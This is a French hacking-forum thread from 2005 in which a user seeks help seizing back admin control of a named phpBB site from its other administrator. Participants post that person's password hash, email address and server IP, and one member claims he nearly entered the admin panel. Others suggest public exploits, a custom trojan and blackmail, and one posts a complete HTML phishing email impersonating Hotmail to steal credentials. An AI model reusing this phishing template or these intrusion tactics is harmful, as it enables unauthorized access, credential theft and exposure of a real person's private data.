NewbieContest

Divers => Hacking => Discussion démarrée par: 2fast4you le 04 Octobre 2005 à 18:16:47



Titre: Piratage phpbb
Posté par: 2fast4you le 04 Octobre 2005 à 18:16:47
Bonjours a tous j'ai creer un site y a envoirens 2 ans, et je me suis embrouillé avec la personne qui la creer qui ma bloquer mes accée au cpanel et au ftp mais le pire c'est qu'il ma viré d aministrateur sur mon forum (il etait aussi administrateur j'aimerai pouvoir recup ma place

Pouvez vous m aider s'il vous plais

Voici l adresse de mon forum

http://tac26.com/phpBB/index.php

son pseudo et laurent le miens est 2fast4you

Merci d avance


Titre: Piratage phpbb
Posté par: PEGASE le 04 Octobre 2005 à 18:38:03
Informe toi sur les failles de phpBB puis fais toi plaisir...


Titre: Piratage phpbb
Posté par: 2fast4you le 04 Octobre 2005 à 19:02:37
Ou je peux trouver sa


Titre: Piratage phpbb
Posté par: Nox le 04 Octobre 2005 à 19:10:33
C'est quel version de phpbb ?


Titre: Piratage phpbb
Posté par: 2fast4you le 04 Octobre 2005 à 19:29:49
2.12 ou 2.13


Titre: Piratage phpbb
Posté par: ARf le 04 Octobre 2005 à 19:32:04
tien sun lien qui pourrai t'aider [http://www.milw0rm.com/remotephp.php?it=phpBB] :)


Titre: Piratage phpbb
Posté par: 2fast4you le 04 Octobre 2005 à 19:37:16
merci


Titre: Piratage phpbb
Posté par: Nms le 04 Octobre 2005 à 19:55:37
Arf pas de chance, ton pote admin vient de passer son forum phpbb en 2.0.17 aujourd'hui même!
Pas de chance, il n'existe aucune faille connue à ce jour sur cette version...
Tu peux toujours essayer le SE


Titre: Piratage phpbb
Posté par: comtezero le 04 Octobre 2005 à 19:57:13
oula la MEGA-BOULETTE


Titre: Piratage phpbb
Posté par: Perfect Slayer le 04 Octobre 2005 à 19:57:40
Lol, il est peut-être passé voir ce topic ?? :rolleyes::P


Titre: Piratage phpbb
Posté par: 2fast4you le 04 Octobre 2005 à 19:58:26
Merde fait chier j'arrive pas a craker son md5, merde je suis degouter la


Titre: Piratage phpbb
Posté par: Perfect Slayer le 04 Octobre 2005 à 20:12:59
Lol, il est pas trouvé dans le dico...? Bah là, il va te falloir pas mal de temps.. :oops


Titre: Piratage phpbb
Posté par: PEGASE le 04 Octobre 2005 à 20:31:08
Good LucK ...


Titre: Piratage phpbb
Posté par: Nms le 04 Octobre 2005 à 20:53:30
2fast4you, tu as réussi à chopper son MD5?
Pourrais-je savoir comment tu as fait? Parce que les failles de la 2.0.17 n'ont pas encore été rendues publiques (si il en existe, ce dont je ne doute pas...)! Tu avais encore un accès à la db pr chopper son MD5?
Post le ici ton MD5 on va te le cracker en 2 sec!


Titre: Piratage phpbb
Posté par: 2fast4you le 04 Octobre 2005 à 20:55:59
J'ai fait une sauvegarde de la bdd de mon forum ce matin je les recuperer dans la bdd

le voici

99c42db6928970f93f201d0ab2c4f965


Titre: Piratage phpbb
Posté par: Nms le 04 Octobre 2005 à 21:15:43
Mort de rire :

Citation
TUNING AUTO CLUB 26

 

Suite à une utilisation abusive et malveillante du site www.tac26.com,

celui-ci est momentanément fermé.

 

Merci de votre compréhension,

Laurent
Juste au moment où j'allais rentrer ds le panel d'admin!! Grrr :lol:
Vous avez bourriné le site les gars ou quoi? ^^


Titre: Piratage phpbb
Posté par: Nox le 04 Octobre 2005 à 21:31:35
http://tac26.com/phpBB/faq.php

Les pages sont toujours accessibles =)


Titre: Piratage phpbb
Posté par: Nms le 04 Octobre 2005 à 22:31:10
J'ai comme l'impression que ton admin a changé son pass...
Le MD5 que t'as filé ne me permet pas de me connecter sous son compte :wink:


Titre: Piratage phpbb
Posté par: 2fast4you le 04 Octobre 2005 à 22:53:19
Oui le deuxieme administrateur a bloquer le site mais le forum il y est encore du coup faut que je pirate le ftp rebalance lindex du site et du forum et ensuite que je pirate le forum y a du taf =)


Titre: Piratage phpbb
Posté par: 2fast4you le 05 Octobre 2005 à 17:32:03
Donc je suis mal barrer le ftp est proteger je peux pas me connecter en anonyme (normal fallait pas rever)

Donc voila je crois que c'est mal barrer

Si quelqu'un se sent capable de le faire qu'il me demande mon msn, on pourrai voir ensemble ce qu'on peut faire ou je pourrai lui filer des infos qui pourron l'aider, le site est heberger sur www.un-nom.com

Bien que titulaire d'un bts infos, je suis vraiment pas caller dans le domaine du piratage =)

Comment on appel sa un newbie je crois

Bon ben sinon bonne continuation a tous j'ai trouver pas mal d infos sympa sur ce site

Merci de votre aide


Titre: Piratage phpbb
Posté par: Perfect Slayer le 05 Octobre 2005 à 19:10:39
Newbie Contest.. un challenge à dimension humaine.. :rolleyes:


Titre: Piratage phpbb
Posté par: Nms le 05 Octobre 2005 à 19:17:34
2fast4you, comme je t'ai dit, le hash MD5 de ton pote admin n'était pas bon, il a sûrement dû changer son pass hier.
Par contre, tu m'as dit que tu avais fait une sauvegarde de la bdd, tu n'aurais pas d'autres hash d'autres admins de ce forum?
Jpeux ptet t'aider à t'en sortir.


Titre: Piratage phpbb
Posté par: 2fast4you le 07 Octobre 2005 à 12:17:53
non la il a tout supprimé le site ma seul solution c'est de pirater le ftp si c'est fesable et de changé les mp et de balancer la sauvegarde du site


Titre: Piratage phpbb
Posté par: Folcan le 07 Octobre 2005 à 13:18:14
Moi je vois plus qu'une solution, Nms, balance la sauce !!

Je suis sur que le faire jouer un coup pourrait le tendre :cool: (tu vois ce que je veux dire ? ^^)


Titre: Piratage phpbb
Posté par: Nms le 07 Octobre 2005 à 13:27:48
Vi vi j'y avais pensé ^^

J'avoue que **No Sms** seule solution qu'il reste ;)

Mais jveux d'abord le peaufiner, faut que ça soit parfait! :cool:


Titre: Piratage phpbb
Posté par: Perfect Slayer le 07 Octobre 2005 à 15:25:47
Lol, tu vas pas lui faire ce que tu m'as montré ?? :oops


Titre: Piratage phpbb
Posté par: Nms le 07 Octobre 2005 à 18:15:32
Pour l'instant ce n'est pas à l'ordre du jour... Mais qd tout sera parfait, **No Sms** pas, faudra voir si ça vaut le coup... Ca reste qd même la solution ultime! ^^


Titre: Piratage phpbb
Posté par: 2fast4you le 07 Octobre 2005 à 18:58:41
Merci nms tu peut me contacter par msn tac26-2fast4you[at]hotmail[dot]com sa serai cool


Titre: Piratage phpbb
Posté par: anycilkler le 08 Octobre 2005 à 19:59:04
Citation de: Folcan
Moi je vois plus qu'une solution, Nms, balance la sauce !!

Je suis sur que le faire jouer un coup pourrait le tendre :cool: (tu vois ce que je veux dire ? ^^)
moi je vois pas de quoi tu parle :lol:
sérieu c'est quoi cette chose dont vous parlez ??
sinon je vois mal comment piratez le site enfin bon moi je vois aps grand chose lol:lol::rolleyes:


Titre: Piratage phpbb
Posté par: Nms le 09 Octobre 2005 à 22:50:02
C'est une ptite invention, un **No Sms** exploit très sympa et TRES puissant ;)
Mais je n'en dirai pas plus, c'est top-secret! 8)
:lol:


Titre: Piratage phpbb
Posté par: Folcan le 10 Octobre 2005 à 07:24:22
Lol salopio ^^


Titre: Piratage phpbb
Posté par: Invit le 10 Octobre 2005 à 12:18:48
Citation de: Nms
C'est une ptite invention, un **No Sms** exploit très sympa et TRES puissant ;)
Mais je n'en dirai pas plus, c'est top-secret! 8)
:lol:
loll... C'est ça la fameuse politique de partage de l'information inhérente aux hackers ? :rolleyes:
Bon, je vais développer un peu, au risque de pas me faire des potes sur ce coups là...

C'est vraiment une invention, un truc si puissant que ça ? Nan parceque me dit que les gars s'enquiquinent à faire des attaques par fuzzing de mémoire partagée, des off-by-one overflows et autres shaters attacks, y ont bien tort parceque juste avec des failles de scripts (donc de script-kiddies, hein, d'où le nom) on peut être le maitre du monde, bref...

En plus, c'est un avis perso, mais me semble-t-il qu'éduquer vaut mieux que de sévir, tout comme "la sécurité par l'oppacité n'est pas valable", en l'occurence garder l'information confidentielle lève plusieurs points :
- c'est perdre une occasion de faire un bon tutoriel expliquant comment et pourquoi celà fonctionne, ou au moins un bulletin de sécu. dans la partie Hacking/News
- ça va à l'encontre de la politique de transparence et de partage de l'information chère aux hackers (me semble hein, plus très sûr...)
- le fait de ne pas la partager peut révèler, au choix :
      * une volonté de ne pas tenter les lamerz qui trainent sur le forum en quête de facilité et d'immédiat, mais surtout d'un certain pouvoir, une certaine puissance sur Internet pour palier à une frustration quelconque
auquel cas, il vaut mieux éduquer, certains trouveront que ça fait peut-être très paternaliste, moi je trouve que c'est typiquement le rôle de ceux qui savent, des ainés en quelque sorte, d'aiguiller les nouveaux venus, soit dans la voie du "je télécharge, je clique, je nuke, donc je suis un hacker" soit dans la voie "j'apprends continuellement, et plus j'apprends, plus je connais, plus je connais, plus j'apprends vite et donc efficacement" ("en outre, il y a toujours meilleur que moi donc pas la peine de fanfaronner") à savoir ce que je considère personnellement comme étant la vraie voie du hacking (indifferement de la couleur du chapeau, c'est un autre débat et un choix politique personnel)
      * ou bien une volonté de supériorité, c'est sûr que ça flatte l'ego, que le monde est beau quand on est au sommet...
au royaume des aveugles les borgnes sont rois.

enfin, je cite (MISC sept-oct. 2005, issu de l'article écrit par Nicolas Ruff et Eric Detoisien) :
"La conclusion que nous en tirons est largement partagée par la communauté de la sécurité : il n'y a pas d'attaques dignes de ce nom lancées sur Internet (ou alors les victimes n'en font pas état) et le niveau moyen des pirates est très faible (heureusement)."

Le post est peut-être mal placé et la critique peut sembler sévère, mais c'était pour faire suite aux précédents posts et je suis sûr que cette dernière sera reçue avec objectivité.
Encore désolé pour ce post un peu inclassable où l'on trouve de tout, mettons qu'au moins y'aura pas besoin de chercher pour avoir la totale :oops

BufferBob - :/

ps : j'aurais peut-etre du mettre ça dans les suggestions également, mais NC commençant à mon avis à se faire un nom sur la "scène" francophone, en ce qui me concerne j'apprécierais grandement des articles orientés technique, sur le fonctionnement des réseaux, le coding etc., la sécurité informatique étant la suite logique à ces deux disciplines et non une "matière" à part et indépendante.


Titre: Piratage phpbb
Posté par: Nms le 10 Octobre 2005 à 13:53:58
BufferBob,

Tout d'abord sache que je suis tout à fait d'accord sur l'ensemble de ton post, le partage de l'information devrait primer et la volonté d'éduquer devrait prendre le dessus sur tout autre considération.

Cependant, si je ne révèle rien de plus sur mon "invention", c'est pour les raisons suivantes :
1) C'est un exploit qui se base sur une faille hyper basique (et toute conne) qui n'a toujours pas été corrigée à ce jour. Et pour cause, qd on connaît la faille on se dit qu'il n'y a vraiment pas grd chose à en tirer... Erreur! Tu serais sidéré de voir ce qu'on est capable de faire à partir de cette faille... Donc comme je n'ai pas envie de voir cette faille bouchée ds les mois qui arrivent, je ne la citerai pas et je n'expliquerai pas comment l'exploiter (à part aux gens en qui j'ai totalement confiance).
2) C'est un exploit très basique, dont la technique est à la portée de n'importe quelle personne ayant un minimum de bases informatiques. Il est même à l'opposé des exploits que tu cites. Il requiert de la patience pour pouvoir le mettre en forme mais son niveau technique est faible. Expliquer son principe reviendrait donc à laisser bon nombre de personnes sans scrupules le reproduire et l'utiliser à des fins pas très louables...
3) Oui il est puissant dans la mesure où il met à priori à disposition n'importe quelle information stockée sur ton dur. Je te laisse donc imaginer les possibilités que ça laisse...
4) Je tiens absolument à le mettre à l'abri des lamerz qui ne cherchent qu'à piquer des scripts puis les faire tourner sans essayer de comprendre comment ils marchent. "Waou ça marche chuis un bon!" --> non merci! Tu comprendras très bien je pense.

Voilà les principales raisons pr lesquelle je n'en dis pas plus, et pourquoi seules 2 personnes en connaissent le fonctionnement et les sources.
Si un jour la faille est bouchée, et donc que l'exploit n'est plus exploitable (^^) je pourrai révéler le principe, mais pas avant. Si je le faisais, tu ne peux même pas imaginer le carnage si ça tombe entre de mauvaises mains...
En tout cas ne t'inquiète pas je n'ai pas du tout mal pris ton post, et je l'ai même trouvé fort à propos! Maintenant que tu connais mes raisons, je pense que tu comprendras ma position.


P.S. : pr les tutos techniques, c en préparation! Vois ça avec Pegase si tu veux en proposer.


Titre: Piratage phpbb
Posté par: 2fast4you le 18 Octobre 2005 à 18:59:39
Alors toujours pas de solution =(


Titre: Piratage phpbb
Posté par: anycilkler le 18 Octobre 2005 à 20:30:34
ben fait un tuto et envois le par MP :lol: je tente tout.
Fallait pas en parlez si tu voulais rien expliquer au lieu de nous mettre l'eau a la bouche :cry:
enfin bon tenpis je m'en rappellerais :lol:
bon sinon prend ton temps et pofine bien ton truc ;)


Titre: Piratage phpbb
Posté par: 2fast4you le 31 Octobre 2005 à 13:14:47
Salut a tous je progresse un peu sur le piratge de mon (enfin ancien site)

Voila les infos que j'ai

   Domain Name: TAC26.COM
   Registrar: ONLINE SAS
   Whois Server: whois.bookmyname.com
   Referral URL: http://www.bookmyname.com
   Name Server: NS97.EDNS1.COM
   Name Server: NS98.EDNS1.COM
   Status: ACTIVE
   Updated Date: 04-feb-2005
   Creation Date: 16-oct-2002
   Expiration Date: 16-oct-2006

Ceque j'ai d autre le nom d utilisateur est toujours tac26 donc y a que le mot de passe qui a changé

L'adresse mail utiliser est spikee@wanadoo.fr

J'ai plusieur idée de faille aussi pour acceder au site

- passer par le livre d or ou part l'album photos des voiture qu il a mis en place je suis presque sur que tout les mot de passe sont identique

Ensuite j'ai fait une analyse avec shadow security scanner il me trouve au moins 10 faille critique mais je sais pas trop comment les exploiter

Voila en gros


Titre: Piratage phpbb
Posté par: 2fast4you le 31 Octobre 2005 à 13:17:26
A oui l'ip du site est 69.93.43.178

Par contre je peu pas me connecter en annonyme par le dos sa me met sa

220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 04:10. Server port: 21.
220 You will be disconnected after 15 minutes of inactivity.

Donc il n'autorise pas d'accées en anonyme


Titre: Piratage phpbb
Posté par: 2fast4you le 31 Octobre 2005 à 13:40:45
A oui autre chose il y a peut etre possibilité de pirater son adresse mail et se faire envoyer les passe dessus mais bon je pense pas que se soit possible de pirater une adresse wanadoo


Titre: Piratage phpbb
Posté par: anycilkler le 31 Octobre 2005 à 13:45:02
:shock: triple post, c'est un nouveau record :lol:


Titre: Piratage phpbb
Posté par: 2fast4you le 31 Octobre 2005 à 14:04:11
J'oublie des chose c'est pour sa lol mais je m'entraine pour faire des records comme sa =)


Titre: Piratage phpbb
Posté par: PEGASE le 31 Octobre 2005 à 14:22:42
Et de l infecter par troyen codé pour l occaz  c possibe ????


Titre: Piratage phpbb
Posté par: 2fast4you le 31 Octobre 2005 à 14:24:03
Je pense qu'il est équipé de bon antivirus mais lui faire envoyer quelque chose c'est entierment possible


Titre: Piratage phpbb
Posté par: anycilkler le 31 Octobre 2005 à 17:15:08
ou alors tu fais un  fake-mail  par msn en lui demandant son mot de passe et tout, il faut une adresse msn du style administrateur@hotmail.com et dans le mail tu lui dit plein de conneries par rapport au serveur etc après si il est un peu bête il te répond, tu essaye voir si sais le bon pass qu'il ta envoyé et après ta 2 solutions tu le fait chanter ou alors tu teste voir si sur msn il a le même passe que sur le forum.
qu'en tu écrit le mail tu met sa:

Citation
<table border="0" cellpadding="0" cellspacing="0" width="63%" height="323" bordercolor="#FFFFFF">
  <tr>
    <td width="100%" height="21" colspan="2" align="center" bgcolor="#FFFFFF" bordercolor="#FFFFFF">
      <p align="center"> <img border="0" src="http://www.loadation.net/images/hotmail.gif" width="602" height="105">
</td>
  </tr>
  <tr>
    <td width="1%" align="center" valign="top" bgcolor="#FFFFFF" bordercolor="#FFFFFF">
    </td>
    <td width="100%" align="center" valign="top"><font face="Arial" size="2" color="#000000">Suite a de nombreux problèmes liés a l'enregistrement des mots de passe sur la base de<br />
données de hotmail, nous nous voyons contraints de vous redemander votre nom d'utilisateur et votre mot de passe.<br />
Pour vous prions donc de nous les envoyer en répondant à cet email.</font>
      <table border="0" cellpadding="0" cellspacing="0" width="100%">
        <tr>
          <td width="100%" bgcolor="#FFFFFF" bordercolor="#FFFFFF"><font face="Arial" size="2">Merci de votre compréhension</font>
            <p><i><font face="Arial" size="2">L'équipe hotmail</font></i></td>
        </tr>
      </table>
 </td>
    <td width="81%" height="302" align="center"></td>
  </tr>
</table>
ce qui te donne un bon truc, bien sur a la place du petit texte déjà mis, tu met se que tu veux.
PS:évite les fautes d'orthographe.
voilà


Titre: Piratage phpbb
Posté par: comtezero le 31 Octobre 2005 à 20:22:40
Ultra connu mais peut-être que ca peut marcher.


Titre: Piratage phpbb
Posté par: anycilkler le 31 Octobre 2005 à 20:31:45
t'attendais quand même pas que je lui trouve une faille pas très connu, c'est moi quand même :lol:
sinon moi je pense que sa peut marcher si c'est bien fait, c'est tout un art :wink:


Titre: Piratage phpbb
Posté par: comtezero le 31 Octobre 2005 à 20:38:07
dans ce cas la faudrait essayer de rajouter des images made in msn


Titre: Piratage phpbb
Posté par: anycilkler le 31 Octobre 2005 à 21:00:30
dans le code que j'ai mis il y en a une, celle de l'en tete mais rien ne l'empeche de compléter